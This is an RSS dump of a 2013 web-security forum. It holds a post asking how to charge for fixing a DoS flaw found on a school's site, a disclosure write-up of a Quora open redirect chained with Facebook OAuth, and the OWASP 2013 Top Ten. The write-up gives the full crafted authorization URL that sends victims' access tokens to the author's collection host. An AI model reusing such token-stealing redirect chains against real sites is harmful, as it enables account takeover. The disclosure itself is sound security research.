Garage4hackers Forum - Web Application Penetration Testing

Garage4hackers Forum - Web Application Penetration Testing http://www.garage4hackers.com/ Discuss Topics Related to Web Application Vulnerabilities Like Browser Security, SQL Injection, XSS, RFI, LFI, CSRF and Other OWASP Top 10. en Wed, 19 Jun 2013 17:37:24 GMT vBulletin 60 http://www.garage4hackers.com/images/misc/rss.png Garage4hackers Forum - Web Application Penetration Testing http://www.garage4hackers.com/ Found DoS vulnerability in one of the educational institution . What to do next ? http://www.garage4hackers.com/f11/found-dos-vulnerability-one-educational-institution-what-do-next-5043.html Mon, 17 Jun 2013 09:14:38 GMT This is my first exploit. I found the known severe DOS vulnerability in one of the educational website. What to do next? How much I can charge...

This is my first exploit.

I found the known severe DOS vulnerability in one of the educational website. What to do next?
How much I can charge for patch (patch:requires little modification in firewall rules) ]]> Web Application Penetration Testing msankith http://www.garage4hackers.com/f11/found-dos-vulnerability-one-educational-institution-what-do-next-5043.html Pwning Facebook accounts, taking a little help from Quora http://www.garage4hackers.com/f11/pwning-facebook-accounts-taking-little-help-quora-5033.html Thu, 13 Jun 2013 22:29:57 GMT I want to share the details of a redirection flaw (http://cwe.mitre.org/data/definitions/601.html), which I found on Quora (http://www.quora.com/),... I want to share the details of a redirection flaw, which I found on Quora, an extremely popular Q/A website, possessing Alexa rank of around 800 worldwide and how someone can exploit the issue to hack Facebook accounts.

So, let's come to the topic. While doing sign-up for Quora website, I preferred using Facebook Connect which gives "limited" access to my account to Quora, so that website can fetch necessary details from my Facebook account for registration. I noticed www.quora.com domain was permitted to receive the access_token from Facebook OAuth, any other domain other than www.quora.com would result in a failure of that request. See below

Attachment 597

Cool, I needed to find an open redirection inside the www.quora.com to steal the access_token of any Quora user who signed-up using Facebook and has App enabled.

Luckily I found a redirection issue in the contacts import page itself. The redirector was like:

https://www.quora.com/contacts/skip?goto=http://www.google.com

So this link would redirect to http://www.google.com, accordingly I can redirect users to any domain of my choice.

Now I made a script that would save the token from URL into a file and redirect [unsuspecting] user to Facebook homepage. It was located at http://poc.prakharprasad.com/quora

To make it a working exploit I needed these:

1. A Facebook OAuth authorization URL requests token permission from the user, but as user will have Quora App installed, it will redirect to value specified in next parameter of OAuth authorization URL with a valid access_token.

2. As discussed we know next can be any page/resource under www.quora.com. So next parameter must be set to https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora ,when redirection happens the token is first sent to (allowed domain) www.quora.com then another redirection [open redirection] moves the token to http://poc.prakharprasad.com/quora where my script will do its job.

Final OAuth authorization URL that would steal the access_token looks like

https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https ://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

Once the vicitm who has Quora App installed (or in other words, signed-up via Facebook) visits the above link, his token would get stored and he'll be redirected back to Facebook, as if nothing has happened.

Using the stolen access_token I can, for example publish a status on victim's profile.

Attachment 595

Quora App has 500,000+ monthly users on Facebook.So, all of them were at risk!

Attachment 596

Here's the video demo :

Timeline:

8th June 2013 - Vulnerability Found
9th June 2013 - Vulnerability Reported
13th June 2013 - No Reply from Quora
13th June 2013 - Another notification sent to Quora staff member, got a reply acknowledging the issue
14th June 2013- Fix issued on Quora, public disclosure

Attached Images

]]> Web Application Penetration Testing prakhar http://www.garage4hackers.com/f11/pwning-facebook-accounts-taking-little-help-quora-5033.html OWASP Top Ten 2013 http://www.garage4hackers.com/f11/owasp-top-ten-2013-a-5008.html Thu, 13 Jun 2013 05:46:46 GMT OWASP Top Ten for 2013 has been released. Here is the Top Ten list: A1 Injection A2 Broken Authentication and Session Management A3... OWASP Top Ten for 2013 has been released. Here is the Top Ten list:

A1 Injection

A2 Broken Authentication and Session Management

A3 Cross-Site Scripting (XSS)

A4 Insecure Direct Object References

A5 Security Misconfiguration

A6 Sensitive Data Exposure

A7 Missing Function Level Access Control

A8 Cross-Site Request Forgery (CSRF)

A9 Using Known Vulnerable Components

A10 Unvalidated Redirects and Forwards

Link: https://www.owasp.org/index.php/Top10

Document: http://owasptop10.googlecode.com/fil...20-%202013.pdf ]]> Web Application Penetration Testing prashant_uniyal http://www.garage4hackers.com/f11/owasp-top-ten-2013-a-5008.html